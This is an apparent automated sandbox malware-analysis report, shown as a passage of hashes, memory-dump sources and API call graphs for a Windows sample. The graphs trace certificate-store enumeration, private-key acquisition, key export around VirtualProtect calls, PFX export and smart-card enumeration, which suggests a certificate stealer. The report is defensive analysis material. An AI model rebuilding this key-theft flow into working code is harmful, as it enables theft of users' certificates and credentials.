                                                                                                                                                                • Source File: 00000008.00000002.2356171732.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_fihcrfb.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Sleep
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3472027048-0
                                                                                                                                                                • Opcode ID: 9898664b938d16c2b1b4e01e78ced3648756847b2d56eb08e3b848ce02c96c48
                                                                                                                                                                • Instruction ID: 4b76d244f62df5aef60288e90a8a0e9aa1e58495ecd570ece09185835f727098
                                                                                                                                                                • Opcode Fuzzy Hash: 9898664b938d16c2b1b4e01e78ced3648756847b2d56eb08e3b848ce02c96c48
                                                                                                                                                                • Instruction Fuzzy Hash: E801CCB1709204EBDB009A849DA2FBB3254AB45704F304177BA53B91F1C13EA513BBAF

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 482 4019af-4019ed call 401240 Sleep 489 4019f3-4019f5 482->489 490 4019ee call 4014c4 482->490 491 401a04-401a52 call 401240 489->491 492 4019f7-4019ff call 4015b7 489->492 490->489 492->491
                                                                                                                                                                APIs
                                                                                                                                                                • Sleep.KERNELBASE(00001388), ref: 004019E0
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.2356171732.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_fihcrfb.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Sleep
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3472027048-0
                                                                                                                                                                • Opcode ID: 30d86e508bd442fb29cd97d6ceaaa55f0d5a2af66fd42037641b9e80c01793f8
                                                                                                                                                                • Instruction ID: a86496d5c410a92ffac719b016bd7af058b42942f4ddbef250fd57ab9bd781cb
                                                                                                                                                                • Opcode Fuzzy Hash: 30d86e508bd442fb29cd97d6ceaaa55f0d5a2af66fd42037641b9e80c01793f8
                                                                                                                                                                • Instruction Fuzzy Hash: BA01DE71309204EBDB00AA848C81BAB3264AB45300F204177F653790F1D23E9522AF5B

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 506 4019b8-4019ed call 401240 Sleep 510 4019f3-4019f5 506->510 511 4019ee call 4014c4 506->511 512 401a04-401a52 call 401240 510->512 513 4019f7-4019ff call 4015b7 510->513 511->510 513->512
                                                                                                                                                                APIs
                                                                                                                                                                • Sleep.KERNELBASE(00001388), ref: 004019E0
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.2356171732.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_fihcrfb.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Sleep
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3472027048-0
                                                                                                                                                                • Opcode ID: c7b252bb0c0a7946a725b17b144dae5cf8c90d4b141733e10c6a991a9ec1216b
                                                                                                                                                                • Instruction ID: 05dce09b803754dc438333d14fb16c9d77e26ddd6ef6fde50045693b00902851
                                                                                                                                                                • Opcode Fuzzy Hash: c7b252bb0c0a7946a725b17b144dae5cf8c90d4b141733e10c6a991a9ec1216b
                                                                                                                                                                • Instruction Fuzzy Hash: 67019E31309104EBEB009B949C82BAB3764AF46314F2445B7F652B91E1D63D9922AB5B
                                                                                                                                                                APIs
                                                                                                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00710546
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.2358138037.000000000070D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0070D000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_70d000_fihcrfb.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                                • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                • Instruction ID: d7434f5def80e29834f98352125face15b679fc8b8285dfaf1c592d287352c20
                                                                                                                                                                • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                • Instruction Fuzzy Hash: 3B112B79A00208EFDB01DF98C989E98BFF5AF08350F058094F9489B362D375EA90DF90
                                                                                                                                                                APIs
                                                                                                                                                                • LocalAlloc.KERNELBASE(00000000,00513D6C,00418CE2), ref: 00418658
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.2356256512.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_40b000_fihcrfb.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AllocLocal
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3494564517-0
                                                                                                                                                                • Opcode ID: 8edb2acf596b02bf36b0311ec2b3e3f34bd0854dc09103549fc4bb4fc422a900
                                                                                                                                                                • Instruction ID: 68696ac1b9cb92420161d977e59fd9b705cf74f057d8962c0b4e3d7dbc73b596
                                                                                                                                                                • Opcode Fuzzy Hash: 8edb2acf596b02bf36b0311ec2b3e3f34bd0854dc09103549fc4bb4fc422a900
                                                                                                                                                                • Instruction Fuzzy Hash: FDB012F0A492009FD700CF54FC64BD03B74F358302F00C061F500C2164EB304908EB10
                                                                                                                                                                APIs
                                                                                                                                                                • BuildCommDCBA.KERNEL32(00000000,?), ref: 00418874
                                                                                                                                                                • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00418886
                                                                                                                                                                • GetNumaAvailableMemoryNode.KERNEL32(00000000,00000000), ref: 004188C1
                                                                                                                                                                • SetCalendarInfoW.KERNEL32(00000000,00000000,00000000,00000000), ref: 004188CF
                                                                                                                                                                • OpenJobObjectA.KERNEL32(00000000,00000000,0041A388), ref: 004188DE
                                                                                                                                                                • BackupSeek.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 004188F0
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.2356256512.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_40b000_fihcrfb.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AvailableBackupBuildCalendarCommEnvironmentFreeInfoMemoryNodeNumaObjectOpenSeekStrings
                                                                                                                                                                • String ID: -
                                                                                                                                                                • API String ID: 2332831159-2547889144
                                                                                                                                                                • Opcode ID: 3ffa615a178d9a6eecd1974a2ff3a989fac76bfbcf92ad5517bae08f135dc1d1
                                                                                                                                                                • Instruction ID: 0644f3d8bb0354bad6e2d065abd9d00753a10c55890622e6c15ca0d418187488
                                                                                                                                                                • Opcode Fuzzy Hash: 3ffa615a178d9a6eecd1974a2ff3a989fac76bfbcf92ad5517bae08f135dc1d1
                                                                                                                                                                • Instruction Fuzzy Hash: 3D11FE31A84304B7E7217BA4AD45BEE3F74AB09B11F51413DFB046A1C1CEB41D81975E
                                                                                                                                                                APIs
                                                                                                                                                                • GetNumaAvailableMemoryNode.KERNEL32(00000000,00000000), ref: 004188C1
                                                                                                                                                                • SetCalendarInfoW.KERNEL32(00000000,00000000,00000000,00000000), ref: 004188CF
                                                                                                                                                                • OpenJobObjectA.KERNEL32(00000000,00000000,0041A388), ref: 004188DE
                                                                                                                                                                • BackupSeek.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 004188F0
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.2356256512.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_40b000_fihcrfb.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AvailableBackupCalendarInfoMemoryNodeNumaObjectOpenSeek
                                                                                                                                                                • String ID: -
                                                                                                                                                                • API String ID: 1414951042-2547889144
                                                                                                                                                                • Opcode ID: 109fde75ff2b8f6bb71f73ec7f4456d624825530d7f2a813498fca8899c3c679
                                                                                                                                                                • Instruction ID: 7ad43abfb1ccff6a3ed9ab509b84ed7d9337a427fc65eba8a3385d97bacaee92
                                                                                                                                                                • Opcode Fuzzy Hash: 109fde75ff2b8f6bb71f73ec7f4456d624825530d7f2a813498fca8899c3c679
                                                                                                                                                                • Instruction Fuzzy Hash: 96F0C231A84305ABDB219FA4EC567D97B70FB08725F614268F6086E1C0CAB41A42DB8A
                                                                                                                                                                APIs
                                                                                                                                                                • QueryDosDeviceA.KERNEL32(0041A398,?,00000000), ref: 00418957
                                                                                                                                                                • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00418972
                                                                                                                                                                • HeapDestroy.KERNEL32(00000000), ref: 00418991
                                                                                                                                                                • GetNumaProcessorNode.KERNEL32(?,00000000), ref: 004189A0
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.2356256512.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_40b000_fihcrfb.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: DestroyDeviceEnvironmentFreeHeapNodeNumaProcessorQueryStrings
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4159173863-0
                                                                                                                                                                • Opcode ID: 6106f044a8ab3b7a482ce23ec0a1203b538232170fb1ceb5eae964420bede924
                                                                                                                                                                • Instruction ID: f860d7c9f62419cabb77a296b47f4597be1339bc88c022d8ab911ec82e630865
                                                                                                                                                                • Opcode Fuzzy Hash: 6106f044a8ab3b7a482ce23ec0a1203b538232170fb1ceb5eae964420bede924
                                                                                                                                                                • Instruction Fuzzy Hash: A20188B4940208DFD720EB64ED55BE97778D718345F40407BEA05A7290DE345E85CF9E

                                                                                                                                                                Execution Graph

                                                                                                                                                                Execution Coverage:19.4%
                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                Signature Coverage:4.5%
                                                                                                                                                                Total number of Nodes:875
                                                                                                                                                                Total number of Limit Nodes:32
                                                                                                                                                                execution_graph 3952 7ff780b62b1c 3963 7ff780b61990 3952->3963 3954 7ff780b62b42 3967 7ff780b619e4 3954->3967 3956 7ff780b62b4d 3957 7ff780b61990 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 3956->3957 3958 7ff780b62b5c 3957->3958 3959 7ff780b61990 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 3958->3959 3960 7ff780b62b6b CertEnumSystemStore 3959->3960 3961 7ff780b61990 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 3960->3961 3962 7ff780b62b94 3961->3962 3964 7ff780b619ad 3963->3964 3972 7ff780b61918 3964->3972 3966 7ff780b619ba 3966->3954 3982 7ff780b67dc8 3967->3982 3973 7ff780b6192e 3972->3973 3975 7ff780b61951 3972->3975 3973->3973 3976 7ff780b62654 3973->3976 3975->3966 3977 7ff780b62669 GetProcessHeap RtlReAllocateHeap 3976->3977 3978 7ff780b62682 3976->3978 3979 7ff780b6268a 3977->3979 3981 7ff780b625dc GetProcessHeap HeapAlloc 3978->3981 3979->3975 3983 7ff780b67de9 3982->3983 3986 7ff780b625dc GetProcessHeap HeapAlloc 3983->3986 4501 7ff780b6639c 4502 7ff780b663c7 4501->4502 4503 7ff780b67234 5 API calls 4502->4503 4504 7ff780b66449 4503->4504 4505 7ff780b67234 5 API calls 4504->4505 4506 7ff780b66468 4505->4506 4507 7ff780b67234 5 API calls 4506->4507 4508 7ff780b66487 4507->4508 4509 7ff780b67234 5 API calls 4508->4509 4510 7ff780b664ed 4509->4510 4511 7ff780b67234 5 API calls 4510->4511 4512 7ff780b6650c 4511->4512 4513 7ff780b67234 5 API calls 4512->4513 4514 7ff780b6652b 4513->4514 4539 7ff780b67298 4514->4539 4516 7ff780b6654a 4517 7ff780b67234 5 API calls 4516->4517 4518 7ff780b66569 4517->4518 4519 7ff780b67234 5 API calls 4518->4519 4520 7ff780b66588 4519->4520 4521 7ff780b67234 5 API calls 4520->4521 4522 7ff780b665f7 4521->4522 4523 7ff780b67234 5 API calls 4522->4523 4524 7ff780b66616 4523->4524 4544 7ff780b672d4 4524->4544 4526 7ff780b66635 4527 7ff780b672d4 5 API calls 4526->4527 4528 7ff780b66654 4527->4528 4529 7ff780b672d4 5 API calls 4528->4529 4530 7ff780b666b7 4529->4530 4531 7ff780b67234 5 API calls 4530->4531 4532 7ff780b666d6 4531->4532 4533 7ff780b67234 5 API calls 4532->4533 4534 7ff780b666f5 4533->4534 4535 7ff780b67234 5 API calls 4534->4535 4536 7ff780b66714 4535->4536 4537 7ff780b67234 5 API calls 4536->4537 4538 7ff780b66733 4537->4538 4540 7ff780b67310 5 API calls 4539->4540 4541 7ff780b672b5 4540->4541 4542 7ff780b672ce 4541->4542 4543 7ff780b61a70 5 API calls 4541->4543 4542->4516 4543->4542 4545 7ff780b67310 5 API calls 4544->4545 4546 7ff780b672f1 4545->4546 4547 7ff780b67309 4546->4547 4548 7ff780b61a70 5 API calls 4546->4548 4547->4526 4548->4547 4549 7ff780b66758 4550 7ff780b6677b 4549->4550 4550->4550 4551 7ff780b67234 5 API calls 4550->4551 4552 7ff780b667ea 4551->4552 4553 7ff780b67234 5 API calls 4552->4553 4554 7ff780b66859 4553->4554 4555 7ff780b67234 5 API calls 4554->4555 4556 7ff780b66878 4555->4556 4557 7ff780b67234 5 API calls 4556->4557 4558 7ff780b66897 4557->4558 4559 7ff780b67234 5 API calls 4558->4559 4560 7ff780b668b6 4559->4560 4576 7ff780b6b424 4577 7ff780b6b447 4576->4577 4578 7ff780b61990 4 API calls 4577->4578 4579 7ff780b6b452 4578->4579 4580 7ff780b61990 4 API calls 4579->4580 4581 7ff780b6b461 4580->4581 4582 7ff780b6b885 4581->4582 4583 7ff780b6b482 4581->4583 4584 7ff780b61990 4 API calls 4582->4584 4585 7ff780b6b4ab 4583->4585 4586 7ff780b6b732 4583->4586 4587 7ff780b6b899 4584->4587 4589 7ff780b61990 4 API calls 4585->4589 4588 7ff780b61990 4 API calls 4586->4588 4591 7ff780b61990 4 API calls 4587->4591 4590 7ff780b6b742 4588->4590 4600 7ff780b6b4bb 4589->4600 4596 7ff780b61990 4 API calls 4590->4596 4592 7ff780b6b8ad 4591->4592 4594 7ff780b61a70 5 API calls 4592->4594 4593 7ff780b6b721 4595 7ff780b61990 4 API calls 4593->4595 4621 7ff780b6b883 4594->4621 4602 7ff780b6b730 4595->4602 4598 7ff780b6b756 4596->4598 4597 7ff780b61990 4 API calls 4599 7ff780b6b8ce 4597->4599 4601 7ff780b61a70 5 API calls 4598->4601 4600->4593 4610 7ff780b6b527 SCardGetStatusChangeW 4600->4610 4616 7ff780b61a70 wvsprintfW GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4600->4616 4624 7ff780b6b5bb SCardListCardsW 4600->4624 4625 7ff780b61990 4 API calls 4600->4625 4627 7ff780b61990 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4600->4627 4628 7ff780b619e4 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4600->4628 4601->4602 4603 7ff780b61990 4 API calls 4602->4603 4604 7ff780b6b77c SCardListCardsW 4603->4604 4605 7ff780b6b7b5 4604->4605 4606 7ff780b6b83e 4604->4606 4607 7ff780b61990 4 API calls 4605->4607 4608 7ff780b61990 4 API calls 4606->4608 4622 7ff780b6b7c5 4607->4622 4609 7ff780b6b84e 4608->4609 4613 7ff780b61990 4 API calls 4609->4613 4610->4600 4611 7ff780b6b820 4612 7ff780b61990 4 API calls 4611->4612 4615 7ff780b6b82f SCardFreeMemory 4612->4615 4614 7ff780b6b862 4613->4614 4617 7ff780b61a70 5 API calls 4614->4617 4618 7ff780b6b874 4615->4618 4616->4600 4617->4618 4619 7ff780b61990 4 API calls 4618->4619 4619->4621 4620 7ff780b619e4 4 API calls 4620->4622 4621->4597 4622->4611 4622->4620 4623 7ff780b61990 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4622->4623 4623->4622 4624->4600 4626 7ff780b6b672 SCardFreeMemory 4625->4626 4626->4600 4627->4600 4628->4600 3987 7ff780b62bac 3988 7ff780b62bc5 3987->3988 3989 7ff780b61990 4 API calls 3988->3989 3990 7ff780b62bdc 3989->3990 3991 7ff780b619e4 4 API calls 3990->3991 3992 7ff780b62bec 3991->3992 3993 7ff780b61990 4 API calls 3992->3993 3994 7ff780b62c00 CertOpenStore 3993->3994 3995 7ff780b62c24 3994->3995 3999 7ff780b62c48 3994->3999 3996 7ff780b61990 4 API calls 3995->3996 3997 7ff780b62c38 3996->3997 4002 7ff780b62d5c CertEnumCertificatesInStore 3997->4002 4000 7ff780b61990 4 API calls 3999->4000 4001 7ff780b62cbd CertCloseStore 4000->4001 4003 7ff780b6319c 4002->4003 4009 7ff780b62daa 4002->4009 4004 7ff780b631ad 4003->4004 4006 7ff780b625b4 2 API calls 4003->4006 4004->3999 4005 7ff780b62db0 CertGetNameStringW 4005->4009 4006->4004 4007 7ff780b61990 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4007->4009 4008 7ff780b619e4 4 API calls 4008->4009 4009->4005 4009->4007 4009->4008 4010 7ff780b61990 4 API calls 4009->4010 4011 7ff780b62e8e CertNameToStrW 4010->4011 4014 7ff780b62eca 4011->4014 4012 7ff780b61990 4 API calls 4012->4014 4013 7ff780b619e4 4 API calls 4013->4014 4014->4012 4014->4013 4015 7ff780b61990 4 API calls 4014->4015 4016 7ff780b62eec CertNameToStrW 4015->4016 4018 7ff780b62f1c 4016->4018 4017 7ff780b61990 4 API calls 4017->4018 4018->4017 4019 7ff780b619e4 4 API calls 4018->4019 4020 7ff780b61990 4 API calls 4018->4020 4019->4018 4021 7ff780b62f3e FileTimeToSystemTime 4020->4021 4022 7ff780b62f84 4021->4022 4037 7ff780b61a70 4022->4037 4024 7ff780b62faf FileTimeToSystemTime 4028 7ff780b62ffa 4024->4028 4025 7ff780b61a70 wvsprintfW GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4025->4028 4028->4025 4030 7ff780b61990 4 API calls 4028->4030 4035 7ff780b6308d 4028->4035 4040 7ff780b679f0 4028->4040 4044 7ff780b625b4 4028->4044 4031 7ff780b6316e CertEnumCertificatesInStore 4030->4031 4031->4003 4031->4005 4033 7ff780b625b4 2 API calls 4033->4035 4034 7ff780b61990 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4034->4035 4035->4028 4035->4033 4035->4034 4036 7ff780b625b4 2 API calls 4035->4036 4047 7ff780b63220 CertGetCertificateContextProperty 4035->4047 4074 7ff780b6a774 4035->4074 4036->4028 4038 7ff780b61918 4 API calls 4037->4038 4039 7ff780b61a96 wvsprintfW 4038->4039 4039->4024 4041 7ff780b67a0d 4040->4041 4042 7ff780b67a09 4040->4042 4078 7ff780b625dc GetProcessHeap HeapAlloc 4041->4078 4042->4028 4045 7ff780b625da 4044->4045 4046 7ff780b625b9 GetProcessHeap HeapFree 4044->4046 4045->4028 4046->4045 4048 7ff780b6348c 4047->4048 4049 7ff780b6326c CryptAcquireCertificatePrivateKey 4047->4049 4048->4035 4049->4048 4050 7ff780b6329b 4049->4050 4051 7ff780b634a9 OpenSCManagerA 4050->4051 4052 7ff780b632b4 CryptGetUserKey 4050->4052 4054 7ff780b634dd 4051->4054 4052->4048 4053 7ff780b632c9 4052->4053 4079 7ff780b636f0 4053->4079 4056 7ff780b634fb 6 API calls 4054->4056 4057 7ff780b635d1 4056->4057 4089 7ff780b625dc GetProcessHeap HeapAlloc 4057->4089 4058 7ff780b632e5 4058->4048 4061 7ff780b63333 LoadLibraryA 4058->4061 4062 7ff780b6335f 4061->4062 4063 7ff780b6337a GetProcAddress VirtualProtect 4062->4063 4064 7ff780b633c1 4063->4064 4068 7ff780b633d0 VirtualProtect CryptExportKey 4064->4068 4065 7ff780b63652 CertOpenStore CertAddCertificateLinkToStore CertSetCertificateContextProperty PFXExportCertStoreEx 4090 7ff780b625dc GetProcessHeap HeapAlloc 4065->4090 4068->4048 4069 7ff780b6340e VirtualProtect 4068->4069 4087 7ff780b6262c 4069->4087 4072 7ff780b63463 CryptImportKey 4072->4048 4073 7ff780b6361d 4072->4073 4073->4065 4075 7ff780b6a79c 4074->4075 4092 7ff780b625dc GetProcessHeap HeapAlloc 4075->4092 4080 7ff780b63728 CryptExportKey 4079->4080 4085 7ff780b6370f 4079->4085 4081 7ff780b637ac 4080->4081 4082 7ff780b6374e 4080->4082 4091 7ff780b625dc GetProcessHeap HeapAlloc 4081->4091 4084 7ff780b637a8 4082->4084 4086 7ff780b63766 CryptExportKey 4082->4086 4084->4058 4085->4080 4086->4081 4086->4084 4088 7ff780b62634 VirtualProtect CryptAcquireContextA 4087->4088 4088->4048 4088->4072 4629 7ff780b669ec 4630 7ff780b66a0f 4629->4630 4631 7ff780b67234 5 API calls 4630->4631 4632 7ff780b66a7e 4631->4632 4633 7ff780b67234 5 API calls 4632->4633 4634 7ff780b66aed 4633->4634 4635 7ff780b672d4 5 API calls 4634->4635 4636 7ff780b66b0c 4635->4636 4637 7ff780b65fac 4638 7ff780b65fc2 4637->4638 4639 7ff780b67234 5 API calls 4638->4639 4640 7ff780b65ff0 4639->4640 4195 7ff780b61968 4198 7ff780b625dc GetProcessHeap HeapAlloc 4195->4198 4647 7ff780b6e3a8 lstrcpyW PathAppendW 4648 7ff780b6e41f 4647->4648 4663 7ff780b6ccf4 RegGetValueW 4648->4663 4651 7ff780b6e4b6 4652 7ff780b61990 4 API calls 4653 7ff780b6e472 4652->4653 4654 7ff780b619e4 4 API calls 4653->4654 4655 7ff780b6e47d 4654->4655 4656 7ff780b61990 4 API calls 4655->4656 4657 7ff780b6e48c 4656->4657 4658 7ff780b619e4 4 API calls 4657->4658 4659 7ff780b6e49b 4658->4659 4660 7ff780b61990 4 API calls 4659->4660 4661 7ff780b6e4aa 4660->4661 4662 7ff780b625b4 2 API calls 4661->4662 4662->4651 4664 7ff780b6cd3d 4663->4664 4665 7ff780b6cd7c 4663->4665 4670 7ff780b62588 GetProcessHeap HeapAlloc 4664->4670 4665->4651 4665->4652 4671 7ff780b66d30 4672 7ff780b66d51 4671->4672 4673 7ff780b67234 5 API calls 4672->4673 4674 7ff780b66dc0 4673->4674 4675 7ff780b67234 5 API calls 4674->4675 4676 7ff780b66e2d 4675->4676 4677 7ff780b672d4 5 API calls 4676->4677 4678 7ff780b66e4c 4677->4678 4687 7ff780b671ec 4678->4687 4680 7ff780b66e6b 4681 7ff780b671ec 5 API calls 4680->4681 4682 7ff780b66edd 4681->4682 4683 7ff780b67234 5 API calls 4682->4683 4684 7ff780b66f42 4683->4684 4685 7ff780b67234 5 API calls 4684->4685 4686 7ff780b66fa0 4685->4686 4688 7ff780b67310 5 API calls 4687->4688 4689 7ff780b67209 4688->4689 4690 7ff780b6722e 4689->4690 4691 7ff780b61990 4 API calls 4689->4691 4690->4680 4691->4690 4692 7ff780b66270 4693 7ff780b66293 4692->4693 4694 7ff780b67234 5 API calls 4693->4694 4695 7ff780b66302 4694->4695 4696 7ff780b67234 5 API calls 4695->4696 4697 7ff780b66321 4696->4697 4698 7ff780b67234 5 API calls 4697->4698 4699 7ff780b66340 4698->4699 4700 7ff780b67234 5 API calls 4699->4700 4701 7ff780b6635f 4700->4701 4702 7ff780b67234 5 API calls 4701->4702 4703 7ff780b6637e 4702->4703 4093 7ff780b673fc 4094 7ff780b6743f 4093->4094 4095 7ff780b61990 4 API calls 4094->4095 4096 7ff780b6746e 4095->4096 4097 7ff780b61a70 5 API calls 4096->4097 4098 7ff780b67490 4097->4098 4099 7ff780b61a70 5 API calls 4098->4099 4100 7ff780b674a4 4099->4100 4141 7ff780b678ec 4100->4141 4103 7ff780b61990 4 API calls 4104 7ff780b674c5 4103->4104 4105 7ff780b61a70 5 API calls 4104->4105 4106 7ff780b674d9 4105->4106 4147 7ff780b679c4 GetNativeSystemInfo 4106->4147 4109 7ff780b61990 4 API calls 4110 7ff780b674fa 4109->4110 4149 7ff780b67138 CoInitializeEx CoInitializeSecurity CoCreateInstance 4110->4149 4112 7ff780b67503 4117 7ff780b675d1 4112->4117 4150 7ff780b6785c 4112->4150 4113 7ff780b6783c 4161 7ff780b67104 4113->4161 4117->4113 4118 7ff780b6785c 5 API calls 4117->4118 4121 7ff780b67629 4118->4121 4119 7ff780b6755b 4120 7ff780b6785c 5 API calls 4119->4120 4123 7ff780b67596 4120->4123 4122 7ff780b6785c 5 API calls 4121->4122 4125 7ff780b67664 4122->4125 4124 7ff780b6785c 5 API calls 4123->4124 4124->4117 4126 7ff780b6785c 5 API calls 4125->4126 4127 7ff780b6769f 4126->4127 4128 7ff780b6785c 5 API calls 4127->4128 4129 7ff780b676da 4128->4129 4130 7ff780b6785c 5 API calls 4129->4130 4131 7ff780b67715 4130->4131 4132 7ff780b6785c 5 API calls 4131->4132 4133 7ff780b67750 4132->4133 4134 7ff780b6785c 5 API calls 4133->4134 4135 7ff780b6778b 4134->4135 4136 7ff780b6785c 5 API calls 4135->4136 4137 7ff780b677c6 4136->4137 4138 7ff780b6785c 5 API calls 4137->4138 4139 7ff780b67801 4138->4139 4140 7ff780b6785c 5 API calls 4139->4140 4140->4113 4142 7ff780b67918 4141->4142 4143 7ff780b67977 LoadLibraryA GetProcAddress 4142->4143 4144 7ff780b674a9 4143->4144 4145 7ff780b67991 GetCurrentProcess IsWow64Process 4143->4145 4144->4103 4145->4144 4146 7ff780b679ad 4145->4146 4146->4144 4148 7ff780b674de 4147->4148 4148->4109 4149->4112 4151 7ff780b61990 4 API calls 4150->4151 4152 7ff780b67888 4151->4152 4153 7ff780b61990 4 API calls 4152->4153 4154 7ff780b67893 4153->4154 4155 7ff780b61990 4 API calls 4154->4155 4156 7ff780b678a2 4155->4156 4164 7ff780b67034 4156->4164 4159 7ff780b61990 4 API calls 4160 7ff780b678d5 4159->4160 4160->4119 4162 7ff780b67116 CoUninitialize 4161->4162 4165 7ff780b67079 4164->4165 4166 7ff780b6707d 4165->4166 4168 7ff780b66004 4165->4168 4166->4159 4169 7ff780b6601a 4168->4169 4172 7ff780b67234 4169->4172 4181 7ff780b67310 4172->4181 4174 7ff780b66042 4176 7ff780b67260 4179 7ff780b61990 4 API calls 4176->4179 4177 7ff780b61990 4 API calls 4178 7ff780b67275 4177->4178 4180 7ff780b619e4 4 API calls 4178->4180 4179->4174 4180->4176 4182 7ff780b6733e 4181->4182 4183 7ff780b67362 4182->4183 4184 7ff780b67381 4182->4184 4188 7ff780b61a70 5 API calls 4183->4188 4185 7ff780b673bb 4184->4185 4186 7ff780b67395 4184->4186 4187 7ff780b61990 4 API calls 4185->4187 4192 7ff780b61a70 5 API calls 4186->4192 4189 7ff780b673ca 4187->4189 4194 7ff780b67251 4188->4194 4190 7ff780b61990 4 API calls 4189->4190 4191 7ff780b673d5 4190->4191 4193 7ff780b61990 4 API calls 4191->4193 4192->4194 4193->4194 4194->4174 4194->4176 4194->4177 4711 7ff780b661f8 4712 7ff780b6620e 4711->4712 4713 7ff780b67234 5 API calls 4712->4713 4714 7ff780b6623c 4713->4714 4715 7ff780b67234 5 API calls 4714->4715 4716 7ff780b6625c 4715->4716 4717 7ff780b6c378 4718 7ff780b6c38b 4717->4718 4719 7ff780b61990 4 API calls 4718->4719 4720 7ff780b6c396 4719->4720 4735 7ff780b6c544 4720->4735 4819 7ff780b6e940 4735->4819 4840 7ff780b625dc GetProcessHeap HeapAlloc 4819->4840 4928 7ff780b6ecb8 4929 7ff780b6ece6 4928->4929 4941 7ff780b6ee03 4928->4941 4929->4941 4942 7ff780b625dc GetProcessHeap HeapAlloc 4929->4942 4493 7ff780b631c4 4494 7ff780b631d7 4493->4494 4495 7ff780b61990 4 API calls 4494->4495 4496 7ff780b631e2 4495->4496 4497 7ff780b61990 4 API calls 4496->4497 4498 7ff780b631f1 CertEnumSystemStoreLocation 4497->4498 4499 7ff780b61990 4 API calls 4498->4499 4500 7ff780b63215 4499->4500 4943 7ff780b6ec04 4944 7ff780b6ec2f 4943->4944 4945 7ff780b6ec1b 4943->4945 4949 7ff780b625dc GetProcessHeap HeapAlloc 4945->4949 4965 7ff780b6e600 lstrcpyW PathAppendW 4966 7ff780b6e640 4965->4966 4967 7ff780b6ccf4 6 API calls 4966->4967 4969 7ff780b6e65c 4967->4969 4968 7ff780b6e6c7 4969->4968 4970 7ff780b61990 4 API calls 4969->4970 4971 7ff780b6e678 4970->4971 4972 7ff780b619e4 4 API calls 4971->4972 4973 7ff780b6e683 4972->4973 4974 7ff780b61990 4 API calls 4973->4974 4975 